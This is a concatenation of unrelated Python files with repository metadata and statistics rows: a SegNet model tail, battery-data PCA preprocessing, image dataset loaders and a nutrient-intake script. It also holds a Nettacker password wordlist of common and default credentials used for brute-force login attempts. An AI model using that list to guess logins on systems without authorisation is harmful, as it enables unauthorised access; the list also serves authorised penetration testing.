    model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])
    model.summary()
    return model
model = SegNet()
| 48.907216 | 143 | 0.619309 | 611 | 4,744 | 4.770867 | 0.109656 | 0.181132 | 0.129674 | 0.089194 | 0.851458 | 0.844597 | 0.837736 | 0.837736 | 0.837736 | 0.837736 | 0 | 0.077438 | 0.180649 | 4,744 | 96 | 144 | 49.416667 | 0.672498 | 0.040051 | 0 | 0.815789 | 0 | 0 | 0.063063 | 0.005405 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013158 | false | 0 | 0.026316 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
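The SegNet above is symmetric: five `MaxPooling2D(2, 2)` halvings in the encoder, five `UpSampling2D(2, 2)` doublings in the decoder, so the output spatial size matches the input. A small sketch of that bookkeeping (pure Python, independent of Keras):

```python
def spatial_sizes(size, n_pool=5):
    # Sizes after each 2x2 pooling, then after each 2x2 upsampling.
    down = [size // (2 ** i) for i in range(n_pool + 1)]
    up = [down[-1] * (2 ** i) for i in range(1, n_pool + 1)]
    return down, up


down, up = spatial_sizes(512)
assert down == [512, 256, 128, 64, 32, 16]
assert up == [32, 64, 128, 256, 512]  # decoder returns to the input size
```

Note the inline shape comments in the file (`#(128,128)` and so on) appear to have been written for a 256x256 input; with `img_w = img_h = 512` the actual sizes are the `down`/`up` values computed here.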
6d273595e9836e3bad2b848c34f4fe60111cc44d | 819 | py | Python | lib/payload/wordlists/passwords.py | ayumi-cloud/Nettacker | 625b88a695a89bd4c1d3510a0294d0ef952d849c | [
"Apache-2.0"
] | 1 | 2021-08-15T16:17:06.000Z | 2021-08-15T16:17:06.000Z | lib/payload/wordlists/passwords.py | zer0x0/Nettacker | 52c5e39a3fd0ab9842c7cf1a8be2de9f560c5d53 | [
"Apache-2.0"
] | 104 | 2018-04-30T03:59:58.000Z | 2022-03-31T02:31:34.000Z | lib/payload/wordlists/passwords.py | pradeepjairamani/OWASP-Nettacker | 988bd960d31e1982d422f6e58590b0f34d7e5215 | [
"Apache-2.0"
] | 1 | 2021-07-23T23:38:19.000Z | 2021-07-23T23:38:19.000Z | def passwords():
    return ['123456', 'password', '12345678', 'qwerty', 'abc123', '123456789', '111111', '1234567', 'iloveyou', 'adobe123', '123123', 'admin', '1234567890', 'letmein', 'photoshop', '1234', 'monkey', 'shadow', 'sunshine', '12345', 'password1', 'princess', 'azerty', 'trustno1', '000000', '1dc13d', 'admin', '123123', 'admin1', 'admins', '123456', '12345678', '7777777', 'letmein', '121212', 'qweqwe', 'iloveyou', 'administrator', 'holysh!t', '55555', '1q2w3e', 'qwerty', 'wordpress', 'wpsite', 'internet', 'asdfghjkl', '121314', 'lollipop', 'killer', 'pass', 'lovers', 'hello', 'dragon', 'admin123', 'office', 'jerome', 'fyfcnfcbz', '', 'root', 'user', '1qaz2wsx', 'toor', 'raspberry', 'dietpi', 'test', 'uploader', 'marketing', 'webadmin', 'webmaster', 'maintaince', 'techsupport', 'logon', 'Passw@rd']
ed9f85e2d80a21f92f237cfd4d486c41a865259b | 9,399 | py | Python | kratosbat/DataProcess/PCA.py | kratos-batteries/kratos-batteries | 5f6bc8824b10144ff7b2f0a00df9baaf5f80c357 | [
"MIT"
] | 1 | 2020-07-14T22:52:55.000Z | 2020-07-14T22:52:55.000Z | kratosbat/DataProcess/PCA.py | kratos-batteries/kratos-batteries | 5f6bc8824b10144ff7b2f0a00df9baaf5f80c357 | [
"MIT"
] | 5 | 2020-03-09T17:52:27.000Z | 2020-03-18T17:13:16.000Z | kratosbat/DataProcess/PCA.py | kratos-batteries/kratos-batteries | 5f6bc8824b10144ff7b2f0a00df9baaf5f80c357 | [
"MIT"
] | null | null | null | """
This PCA analysis will produce normalized data to \
be used for the training model
"""
import numpy as np
import pandas as pd
from sklearn import preprocessing
from sklearn.decomposition import PCA
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
def pcacsv(DF):
    # Change strings to numbers
    LB = preprocessing.LabelBinarizer()
    WI = LB.fit_transform(np.array(DF.loc[:, ['Working Ion']]))
    CS = LB.fit_transform(np.array(DF.loc[:, ['Crystal System']]))
    SN = LB.fit_transform(np.array(DF.loc[:, ['Spacegroup Number']]))
    EL = np.array(DF.loc[:, ['mean_Number', 'mean_MendeleevNumber',
'mean_AtomicWeight', 'mean_MeltingT', 'mean_Column', 'mean_Row',
'mean_CovalentRadius', 'mean_Electronegativity', 'mean_NsValence',
'mean_NpValence', 'mean_NdValence', 'mean_NfValence', 'mean_NValance',
'mean_NsUnfilled', 'mean_NpUnfilled', 'mean_NdUnfilled',
'mean_NfUnfilled', 'mean_NUnfilled', 'mean_GSvolume_pa',
'mean_GSbandgap', 'mean_GSmagmom', 'mean_SpaceGroupNumber',
'dev_Number', 'dev_MendeleevNumber', 'dev_AtomicWeight', 'dev_MeltingT',
'dev_Column', 'dev_Row', 'dev_CovalentRadius', 'dev_Electronegativity',
'dev_NsValence', 'dev_NpValence', 'dev_NdValence', 'dev_NfValence',
'dev_NValance', 'dev_NsUnfilled', 'dev_NpUnfilled', 'dev_NdUnfilled',
'dev_NfUnfilled', 'dev_NUnfilled', 'dev_GSvolume_pa', 'dev_GSbandgap',
'dev_GSmagmom', 'dev_SpaceGroupNumber', 'mean_Number.1',
'mean_MendeleevNumber.1', 'mean_AtomicWeight.1', 'mean_MeltingT.1',
'mean_Column.1', 'mean_Row.1', 'mean_CovalentRadius.1',
'mean_Electronegativity.1', 'mean_NsValence.1', 'mean_NpValence.1',
'mean_NdValence.1', 'mean_NfValence.1', 'mean_NValance.1',
'mean_NsUnfilled.1', 'mean_NpUnfilled.1', 'mean_NdUnfilled.1',
'mean_NfUnfilled.1', 'mean_NUnfilled.1', 'mean_GSvolume_pa.1',
'mean_GSbandgap.1', 'mean_GSmagmom.1', 'mean_SpaceGroupNumber.1',
'dev_Number.1', 'dev_MendeleevNumber.1', 'dev_AtomicWeight.1',
'dev_MeltingT.1', 'dev_Column.1', 'dev_Row.1', 'dev_CovalentRadius.1',
'dev_Electronegativity.1', 'dev_NsValence.1', 'dev_NpValence.1',
'dev_NdValence.1', 'dev_NfValence.1', 'dev_NValance.1',
'dev_NsUnfilled.1', 'dev_NpUnfilled.1', 'dev_NdUnfilled.1',
'dev_NfUnfilled.1', 'dev_NUnfilled.1', 'dev_GSvolume_pa.1',
'dev_GSbandgap.1', 'dev_GSmagmom.1', 'dev_SpaceGroupNumber.1']])
    PROP = np.hstack((WI, CS, SN, EL))
    return DF, PROP
def pcasts():
    # Use StandardScaler
    DF, PROP = pcacsv(pd.read_csv('../Data/TrainingData.csv'))
    SS = StandardScaler()
    SS.fit(PROP)
    PSS = SS.transform(PROP)
    PCA1 = PCA(n_components=165)
    NEW_DATA = PCA1.fit_transform(PSS)
    NEW_DF = pd.DataFrame(NEW_DATA)
    OUTPUTS = np.array(DF.loc[:, ['Gravimetric Capacity (units)',
                                  'Volumetric Capacity', 'Max Delta Volume']])
    NEW_DF['Gravimetric Capacity (units)'] = SS.fit_transform(OUTPUTS)[:, [0]]
    NEW_DF['Volumetric Capacity'] = SS.fit_transform(OUTPUTS)[:, [1]]
    NEW_DF['Max Delta Volume'] = SS.fit_transform(OUTPUTS)[:, [2]]
    NEW_DF.to_csv('../Data/NEWTrainingData_StandardScaler.csv')
    return
def pcamms():
    # Use MinMaxScaler
    DF, PROP = pcacsv(pd.read_csv('../Data/TrainingData.csv'))
    MS = MinMaxScaler()
    PMS = MS.fit_transform(PROP)
    PCA2 = PCA(n_components=115)
    NEW_DATA2 = PCA2.fit_transform(PMS)
    NEW_DF2 = pd.DataFrame(NEW_DATA2)
    OUTPUTS = np.array(DF.loc[:, ['Gravimetric Capacity (units)',
                                  'Volumetric Capacity', 'Max Delta Volume']])
    NEW_DF2['Gravimetric Capacity (units)'] = MS.fit_transform(OUTPUTS)[:, [0]]
    NEW_DF2['Volumetric Capacity'] = MS.fit_transform(OUTPUTS)[:, [1]]
    NEW_DF2['Max Delta Volume'] = MS.fit_transform(OUTPUTS)[:, [2]]
    NEW_DF2.to_csv('../Data/NEWTrainingData_MinMaxScaler.csv')
    return
def transts(data):
    # Transform data
    # Use StandardScaler
    CSV = pd.read_csv('../Data/TrainingData.csv')
    DF, PROP = pcacsv(CSV)
    data.columns = ['Battery ID', 'Working Ion', 'Crystal System', 'Spacegroup Number',
'Gravimetric Capacity (units)', 'Volumetric Capacity',
'Max Delta Volume', 'mean_Number', 'mean_MendeleevNumber',
'mean_AtomicWeight', 'mean_MeltingT', 'mean_Column', 'mean_Row',
'mean_CovalentRadius', 'mean_Electronegativity', 'mean_NsValence',
'mean_NpValence', 'mean_NdValence', 'mean_NfValence', 'mean_NValance',
'mean_NsUnfilled', 'mean_NpUnfilled', 'mean_NdUnfilled',
'mean_NfUnfilled', 'mean_NUnfilled', 'mean_GSvolume_pa',
'mean_GSbandgap', 'mean_GSmagmom', 'mean_SpaceGroupNumber',
'dev_Number', 'dev_MendeleevNumber', 'dev_AtomicWeight', 'dev_MeltingT',
'dev_Column', 'dev_Row', 'dev_CovalentRadius', 'dev_Electronegativity',
'dev_NsValence', 'dev_NpValence', 'dev_NdValence', 'dev_NfValence',
'dev_NValance', 'dev_NsUnfilled', 'dev_NpUnfilled', 'dev_NdUnfilled',
'dev_NfUnfilled', 'dev_NUnfilled', 'dev_GSvolume_pa', 'dev_GSbandgap',
'dev_GSmagmom', 'dev_SpaceGroupNumber', 'mean_Number.1',
'mean_MendeleevNumber.1', 'mean_AtomicWeight.1', 'mean_MeltingT.1',
'mean_Column.1', 'mean_Row.1', 'mean_CovalentRadius.1',
'mean_Electronegativity.1', 'mean_NsValence.1', 'mean_NpValence.1',
'mean_NdValence.1', 'mean_NfValence.1', 'mean_NValance.1',
'mean_NsUnfilled.1', 'mean_NpUnfilled.1', 'mean_NdUnfilled.1',
'mean_NfUnfilled.1', 'mean_NUnfilled.1', 'mean_GSvolume_pa.1',
'mean_GSbandgap.1', 'mean_GSmagmom.1', 'mean_SpaceGroupNumber.1',
'dev_Number.1', 'dev_MendeleevNumber.1', 'dev_AtomicWeight.1',
'dev_MeltingT.1', 'dev_Column.1', 'dev_Row.1', 'dev_CovalentRadius.1',
'dev_Electronegativity.1', 'dev_NsValence.1', 'dev_NpValence.1',
'dev_NdValence.1', 'dev_NfValence.1', 'dev_NValance.1',
'dev_NsUnfilled.1', 'dev_NpUnfilled.1', 'dev_NdUnfilled.1',
'dev_NfUnfilled.1', 'dev_NUnfilled.1', 'dev_GSvolume_pa.1',
'dev_GSbandgap.1', 'dev_GSmagmom.1', 'dev_SpaceGroupNumber.1']
    NData = pd.concat(objs=[data, CSV], axis=0)
    NDF, NPROP = pcacsv(NData)
    SS = StandardScaler()
    SS.fit(PROP)
    PSS = SS.transform(PROP)
    PCA1 = PCA(n_components=165)
    PCA1.fit(PSS)
    NEW_DATA1 = PCA1.transform(SS.transform(NPROP[0].reshape(1, -1)))
    return NEW_DATA1
def tranmms(data):
    # Transform data
    # Use MinMaxScaler
    CSV = pd.read_csv('../Data/TrainingData.csv')
    DF, PROP = pcacsv(CSV)
    data.columns = ['Battery ID', 'Working Ion', 'Crystal System', 'Spacegroup Number',
'Gravimetric Capacity (units)', 'Volumetric Capacity',
'Max Delta Volume', 'mean_Number', 'mean_MendeleevNumber',
'mean_AtomicWeight', 'mean_MeltingT', 'mean_Column', 'mean_Row',
'mean_CovalentRadius', 'mean_Electronegativity', 'mean_NsValence',
'mean_NpValence', 'mean_NdValence', 'mean_NfValence', 'mean_NValance',
'mean_NsUnfilled', 'mean_NpUnfilled', 'mean_NdUnfilled',
'mean_NfUnfilled', 'mean_NUnfilled', 'mean_GSvolume_pa',
'mean_GSbandgap', 'mean_GSmagmom', 'mean_SpaceGroupNumber',
'dev_Number', 'dev_MendeleevNumber', 'dev_AtomicWeight', 'dev_MeltingT',
'dev_Column', 'dev_Row', 'dev_CovalentRadius', 'dev_Electronegativity',
'dev_NsValence', 'dev_NpValence', 'dev_NdValence', 'dev_NfValence',
'dev_NValance', 'dev_NsUnfilled', 'dev_NpUnfilled', 'dev_NdUnfilled',
'dev_NfUnfilled', 'dev_NUnfilled', 'dev_GSvolume_pa', 'dev_GSbandgap',
'dev_GSmagmom', 'dev_SpaceGroupNumber', 'mean_Number.1',
'mean_MendeleevNumber.1', 'mean_AtomicWeight.1', 'mean_MeltingT.1',
'mean_Column.1', 'mean_Row.1', 'mean_CovalentRadius.1',
'mean_Electronegativity.1', 'mean_NsValence.1', 'mean_NpValence.1',
'mean_NdValence.1', 'mean_NfValence.1', 'mean_NValance.1',
'mean_NsUnfilled.1', 'mean_NpUnfilled.1', 'mean_NdUnfilled.1',
'mean_NfUnfilled.1', 'mean_NUnfilled.1', 'mean_GSvolume_pa.1',
'mean_GSbandgap.1', 'mean_GSmagmom.1', 'mean_SpaceGroupNumber.1',
'dev_Number.1', 'dev_MendeleevNumber.1', 'dev_AtomicWeight.1',
'dev_MeltingT.1', 'dev_Column.1', 'dev_Row.1', 'dev_CovalentRadius.1',
'dev_Electronegativity.1', 'dev_NsValence.1', 'dev_NpValence.1',
'dev_NdValence.1', 'dev_NfValence.1', 'dev_NValance.1',
'dev_NsUnfilled.1', 'dev_NpUnfilled.1', 'dev_NdUnfilled.1',
'dev_NfUnfilled.1', 'dev_NUnfilled.1', 'dev_GSvolume_pa.1',
'dev_GSbandgap.1', 'dev_GSmagmom.1', 'dev_SpaceGroupNumber.1']
    NData = pd.concat(objs=[data, CSV], axis=0)
    NDF, NPROP = pcacsv(NData)
    MS = MinMaxScaler()
    MS.fit(PROP)
    PMS = MS.transform(PROP)
    PCA2 = PCA(n_components=115)
    PCA2.fit(PMS)
    NEW_DATA2 = PCA2.transform(MS.transform(NPROP[0].reshape(1, -1)))
    return NEW_DATA2 | 49.994681 | 95 | 0.649963 | 1,104 | 9,399 | 5.245471 | 0.108696 | 0.045588 | 0.009325 | 0.012433 | 0.827491 | 0.803661 | 0.803661 | 0.778449 | 0.767052 | 0.753238 | 0 | 0.023772 | 0.198851 | 9,399 | 188 | 96 | 49.994681 | 0.745286 | 0.021492 | 0 | 0.735099 | 0 | 0 | 0.519495 | 0.091266 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033113 | false | 0 | 0.039735 | 0 | 0.10596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
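Both scalers used in the PCA module above apply simple per-column formulas; `MinMaxScaler` in particular maps each column to [0, 1] via (v - min) / (max - min). A pure-Python sketch of that formula (illustrative only, not the sklearn implementation):

```python
def minmax_scale(column):
    # (v - min) / (max - min), as MinMaxScaler does per feature column.
    lo, hi = min(column), max(column)
    return [(v - lo) / (hi - lo) for v in column]


assert minmax_scale([2.0, 4.0, 6.0]) == [0.0, 0.5, 1.0]
```

`StandardScaler` is analogous but maps each column to zero mean and unit variance ((v - mean) / std) instead of a fixed range.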
edabad4870c7c2a7ed37568c95d16f144064e0f1 | 5,791 | py | Python | nvidia_original/src/datasets/dataset_image.py | lgraesser/im2im2im | 835d84b782921f6c40d8cc4416c3fc492187eb58 | [
"MIT"
] | 7 | 2018-04-17T09:56:37.000Z | 2021-08-28T10:03:22.000Z | nvidia_original/src/datasets/dataset_image.py | lgraesser/im2im2im | 835d84b782921f6c40d8cc4416c3fc492187eb58 | [
"MIT"
] | null | null | null | nvidia_original/src/datasets/dataset_image.py | lgraesser/im2im2im | 835d84b782921f6c40d8cc4416c3fc492187eb58 | [
"MIT"
] | 2 | 2018-03-03T20:39:49.000Z | 2018-04-17T03:48:23.000Z | """
Copyright (C) 2017 NVIDIA Corporation. All rights reserved.
Licensed under the CC BY-NC-ND 4.0 license (https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode).
"""
from __future__ import print_function
import os
import numpy as np
import cv2
import torch
import torch.utils.data as data
class dataset_image(data.Dataset):
def __init__(self, specs):
self.root = specs['root']
self.folder = specs['folder']
self.list_name = specs['list_name']
self.scale = specs['scale']
self.crop_image_height = specs['crop_image_height']
self.crop_image_width = specs['crop_image_width']
list_fullpath = os.path.join(self.root, self.list_name)
with open(list_fullpath) as f:
content = f.readlines()
self.images = [os.path.join(self.root, self.folder, x.strip().split(' ')[0]) for x in content]
np.random.shuffle(self.images)
self.dataset_size = len(self.images)
def __getitem__(self, index):
crop_img = self._load_one_image(self.images[index])
        raw_data = crop_img.transpose((2, 0, 1))  # convert HWC to CHW
data = ((torch.FloatTensor(raw_data)/255.0)-0.5)*2
return data
def __len__(self):
return self.dataset_size
def _load_one_image(self, img_name, test=False):
img = cv2.cvtColor(cv2.imread(img_name), cv2.COLOR_BGR2RGB)
if self.scale > 0:
img = cv2.resize(img,None,fx=self.scale,fy=self.scale)
img = np.float32(img)
h, w, c = img.shape
if test==True:
            x_offset = int((w - self.crop_image_width)/2)
            y_offset = int((h - self.crop_image_height)/2)
else:
if np.random.rand(1) > 0.5:
img = cv2.flip(img, 1)
x_offset = np.int32(np.random.randint(0, w - self.crop_image_width + 1, 1))[0]
y_offset = np.int32(np.random.randint(0, h - self.crop_image_height + 1, 1))[0]
crop_img = img[y_offset:(y_offset + self.crop_image_height), x_offset:(x_offset + self.crop_image_width), :]
return crop_img
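As a quick sanity check of the `__getitem__` pipeline above, the transpose and arithmetic map an HWC uint8-range crop into a CHW tensor in [-1, 1]. This is a minimal sketch that uses a plain NumPy array in place of `torch.FloatTensor` so it runs without PyTorch:

```python
import numpy as np

# Synthetic HWC crop standing in for the output of _load_one_image
crop_img = np.zeros((4, 4, 3), dtype=np.float32)
crop_img[..., 0] = 255.0  # channel 0 fully saturated

# Same arithmetic as dataset_image.__getitem__: HWC -> CHW, then [0, 255] -> [-1, 1]
raw_data = crop_img.transpose((2, 0, 1))
data = ((raw_data / 255.0) - 0.5) * 2

assert data.shape == (3, 4, 4)
assert data[0].min() == 1.0   # 255 maps to +1
assert data[1].max() == -1.0  # 0 maps to -1
```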
class dataset_blur_image(dataset_image):
def _load_one_image(self, img_name, test=False):
img = cv2.cvtColor(cv2.imread(img_name), cv2.COLOR_BGR2RGB)
img = cv2.GaussianBlur(img, (3,3), 0)
if self.scale > 0:
img = cv2.resize(img, None, fx=self.scale, fy=self.scale)
img = np.float32(img)
h, w, c = img.shape
if test == True:
            x_offset = int((w - self.crop_image_width) / 2)
            y_offset = int((h - self.crop_image_height) / 2)
else:
if np.random.rand(1) > 0.5:
img = cv2.flip(img, 1)
x_offset = np.int32(np.random.randint(0, w - self.crop_image_width + 1, 1))[0]
y_offset = np.int32(np.random.randint(0, h - self.crop_image_height + 1, 1))[0]
crop_img = img[y_offset:(y_offset + self.crop_image_height), x_offset:(x_offset + self.crop_image_width), :]
return crop_img
class dataset_imagenet_image(dataset_image):
def __init__(self, specs):
self.root = specs['root']
self.folder = specs['folder']
self.list_name = specs['list_name']
self.crop_image_height = specs['crop_image_height']
self.crop_image_width = specs['crop_image_width']
self.scale = specs['scale']
list_fullpath = os.path.join(self.root, self.list_name)
with open(list_fullpath) as f:
content = f.readlines()
self.images = [os.path.join(self.root, self.folder, x.strip().split(' ')[0]) for x in content]
np.random.shuffle(self.images)
self.dataset_size = len(self.images)
def _load_one_image(self, img_name, test=False):
img = cv2.cvtColor(cv2.imread(img_name), cv2.COLOR_BGR2RGB)
h, w, c = img.shape
if h > w:
scale = self.crop_image_width * 1.0 / w
else:
scale = self.crop_image_height * 1.0 / h
scale *= self.scale
img = cv2.resize(img, None, fx=scale, fy=scale)
img = np.float32(img)
h, w, c = img.shape
if test == True:
            x_offset = int((w - self.crop_image_width) / 2)
            y_offset = int((h - self.crop_image_height) / 2)
else:
if np.random.rand(1) > 0.5:
img = cv2.flip(img, 1)
x_offset = np.int32(np.random.randint(0, w - self.crop_image_width + 1, 1))[0]
y_offset = np.int32(np.random.randint(0, h - self.crop_image_height + 1, 1))[0]
crop_img = img[y_offset:(y_offset + self.crop_image_height), x_offset:(x_offset + self.crop_image_width), :]
return crop_img
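The resize logic in `dataset_imagenet_image._load_one_image` scales the image so that its shorter side matches the corresponding crop dimension, then multiplies by the user-supplied scale. A small standalone sketch of that rule (the numbers are hypothetical):

```python
# Shorter-side scaling as used in dataset_imagenet_image._load_one_image
def shorter_side_scale(h, w, crop_h, crop_w, extra_scale=1.0):
    if h > w:
        scale = crop_w * 1.0 / w
    else:
        scale = crop_h * 1.0 / h
    return scale * extra_scale

# Either orientation of a 400x200 image maps its shorter side onto a 128 crop
assert shorter_side_scale(400, 200, 128, 128) == 0.64
assert shorter_side_scale(200, 400, 128, 128) == 0.64
assert shorter_side_scale(200, 400, 128, 128, extra_scale=2.0) == 1.28
```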
class dataset_dvd_image(dataset_image):
def __init__(self, specs):
self.root = specs['root']
self.folder = specs['folder']
self.list_name = specs['list_name']
self.crop_image_height = specs['crop_image_height']
self.crop_image_width = specs['crop_image_width']
list_fullpath = os.path.join(self.root, self.list_name)
with open(list_fullpath) as f:
content = f.readlines()
self.images = [os.path.join(self.root, self.folder, x.strip().split(' ')[0]) for x in content]
np.random.shuffle(self.images)
self.dataset_size = len(self.images)
def _load_one_image(self, img_name, test=False):
img = cv2.cvtColor(cv2.imread(img_name), cv2.COLOR_BGR2RGB)
h, w, c = img.shape
# if h > w:
# scale = self.crop_image_width * 1.0 / w
# else:
# scale = self.crop_image_height * 1.0 / h
# img = cv2.resize(img, None, fx=scale, fy=scale)
img = np.float32(img)
h, w, c = img.shape
if test == True:
            x_offset = int((w - self.crop_image_width) / 2)
            y_offset = int((h - self.crop_image_height) / 2)
else:
if np.random.rand(1) > 0.5:
img = cv2.flip(img, 1)
x_offset = np.int32(np.random.randint(0, w - self.crop_image_width + 1, 1))[0]
y_offset = np.int32(np.random.randint(0, h - self.crop_image_height + 1, 1))[0]
crop_img = img[y_offset:(y_offset + self.crop_image_height), x_offset:(x_offset + self.crop_image_width), :]
return crop_img
| 40.215278 | 112 | 0.659817 | 948 | 5,791 | 3.814346 | 0.120253 | 0.099558 | 0.122235 | 0.089325 | 0.85979 | 0.853982 | 0.853982 | 0.853982 | 0.853982 | 0.853982 | 0 | 0.03042 | 0.193922 | 5,791 | 143 | 113 | 40.496504 | 0.744216 | 0.057158 | 0 | 0.798387 | 0 | 0 | 0.031032 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072581 | false | 0 | 0.048387 | 0.008065 | 0.201613 | 0.008065 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b65067cac12360afc3464cb72172c0bb518349fc | 14,150 | py | Python | gfdx/analysis/potential_nutrient_intake.py | nanthony007/gfdx | 2ca37496f681d91572e6a8237f9b0f1a0056fd8f | [
"MIT"
] | null | null | null | gfdx/analysis/potential_nutrient_intake.py | nanthony007/gfdx | 2ca37496f681d91572e6a8237f9b0f1a0056fd8f | [
"MIT"
] | null | null | null | gfdx/analysis/potential_nutrient_intake.py | nanthony007/gfdx | 2ca37496f681d91572e6a8237f9b0f1a0056fd8f | [
"MIT"
] | 1 | 2020-11-28T19:49:17.000Z | 2020-11-28T19:49:17.000Z | # -*- coding: utf-8 -*-
"""Potential Nutrient Intake.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/107j9j8FvTv9WRSWEZMyJv1uODpyJFbl_
## Potential Nutrient intake
"""
# Package that allows importing from the REDCap API
from redcap import Project
import pandas as pd
import numpy as np
import os
from tqdm.notebook import tqdm # progress bar
# Connecting to GFDx Redcap API
api_key = os.environ.get("APIKEY")
# Connecting to GFDx Redcap API
URL = "https://redcap.emory.edu/api/"
project = Project(URL, api_key)
# Pulls out variables of interest
fields_of_interest = [
"country_code",
"nutrient_level",
"latest_intake_api",
"ip_pc_api",
"compliance_pc_api",
"standard_nutrient",
]
subset = project.export_records(fields=fields_of_interest, format="df")
# Reset index
df = subset
df.reset_index(inplace=True)
df = df[df.country_code != 999.0] # Remove country code 999
food_list = [
"maize_flour_arm_1",
"wheat_flour_arm_1",
"rice_arm_1",
"salt_arm_1",
"oil_arm_1",
"maize_flour_arm_2",
"wheat_flour_arm_2",
"rice_arm_2",
"salt_arm_2",
"oil_arm_2",
]
df2 = df[df.redcap_event_name.isin(food_list)]
df1 = df2[df2.redcap_repeat_instrument == "nutrients_compounds"]
df_copy1 = df1.copy()
# 1. Nutrient Intake
def intake_pc(row):
try:
return float(row.nutrient_level) / 1000 * (float(row.latest_intake_api))
except ValueError:
return "Not enough data to calculate"
df_copy1["nutrient_intake"] = df_copy1.apply(lambda row: intake_pc(row), axis=1)
# 2. Nutrient Intake, Adjusted
def intake_adj_pc(row):
if row.nutrient_intake == "Not enough data to calculate":
return "Not enough data to calculate"
else:
try:
return (
float(row.nutrient_intake)
* (float(row.ip_pc_api) / 100)
* (float(row.compliance_pc_api) / 100)
)
except ValueError:
return "Not enough data to calculate"
df_copy1["nutrient_intake_adj"] = df_copy1.apply(lambda row: intake_adj_pc(row), axis=1)
# 3. EAR
def ear_pc(row):
    # EAR denominator per standard_nutrient code
    ear_values = {1: 1.1, 2: 0.002, 3: 800, 4: 3, 5: 0.4, 6: 0.095, 7: 8.1,
                  8: 11, 9: 0.9, 10: 0.045, 11: 0.9, 12: 0.5, 13: 0.01,
                  14: 12, 15: 6.8}
    if row.nutrient_intake == "Not enough data to calculate":
        return "Not enough data to calculate"
    if row.standard_nutrient not in ear_values:
        return None
    try:
        return float(row.nutrient_intake) / ear_values[row.standard_nutrient] * 100
    except ValueError:
        return "Not enough data to calculate"
df_copy1["nutrient_ear_pc"] = df_copy1.apply(lambda row: ear_pc(row), axis=1)
# 4. EAR, Adjusted
def ear_adj_pc(row):
    # EAR denominator per standard_nutrient code
    ear_values = {1: 1.1, 2: 0.002, 3: 800, 4: 3, 5: 0.4, 6: 0.095, 7: 8.1,
                  8: 11, 9: 0.9, 10: 0.045, 11: 0.9, 12: 0.5, 13: 0.01,
                  14: 12, 15: 6.8}
    if row.nutrient_intake_adj == "Not enough data to calculate":
        return "Not enough data to calculate"
    if row.standard_nutrient not in ear_values:
        return None
    try:
        return float(row.nutrient_intake_adj) / ear_values[row.standard_nutrient] * 100
    except ValueError:
        return "Not enough data to calculate"
df_copy1["nutrient_ear_pc_adj"] = df_copy1.apply(lambda row: ear_adj_pc(row), axis=1)
# 5. UL
def ul_pc(row):
    # UL denominator per standard_nutrient code; codes 2, 9 and 11 have no UL
    ul_values = {1: 100, 3: 2500, 4: 10, 5: 1, 6: 0.6, 7: 45, 8: 35,
                 10: 0.04, 12: 3, 13: 0.1, 14: 1000, 15: 40}
    if row.standard_nutrient in (2, 9, 11):
        return "No UL for this nutrient"
    if row.nutrient_intake == "Not enough data to calculate":
        return "Not enough data to calculate"
    if row.standard_nutrient not in ul_values:
        return None
    try:
        return float(row.nutrient_intake) / ul_values[row.standard_nutrient] * 100
    except ValueError:
        return "Not enough data to calculate"
df_copy1["nutrient_ul_pc"] = df_copy1.apply(lambda row: ul_pc(row), axis=1)
# 6. UL, Adjusted
def ul_adj_pc(row):
    # UL denominator per standard_nutrient code; codes 2, 9 and 11 have no UL
    ul_values = {1: 100, 3: 2500, 4: 10, 5: 1, 6: 0.6, 7: 45, 8: 35,
                 10: 0.04, 12: 3, 13: 0.1, 14: 1000, 15: 40}
    if row.standard_nutrient in (2, 9, 11):
        return "No UL for this nutrient"
    if row.nutrient_intake_adj == "Not enough data to calculate":
        return "Not enough data to calculate"
    if row.standard_nutrient not in ul_values:
        return None
    try:
        return float(row.nutrient_intake_adj) / ul_values[row.standard_nutrient] * 100
    except ValueError:
        return "Not enough data to calculate"
df_copy1["nutrient_ul_pc_adj"] = df_copy1.apply(lambda row: ul_adj_pc(row), axis=1)
final = df_copy1
final.drop(["nutrient_level"], axis=1, inplace=True)
final.drop(["latest_intake_api"], axis=1, inplace=True)
final.drop(["ip_pc_api"], axis=1, inplace=True)
final.drop(["compliance_pc_api"], axis=1, inplace=True)
final.drop(["standard_nutrient"], axis=1, inplace=True)
final["country_code"] = final.country_code.apply(lambda x: int(x))
final["redcap_repeat_instance"] = final.redcap_repeat_instance.apply(lambda x: int(x))
# Formats data into acceptable table for import into REDCap
final2 = final.set_index(["country_code", "redcap_event_name"])
# FINAL IMPORT - Import to REDCap through API
project.import_records(final2)
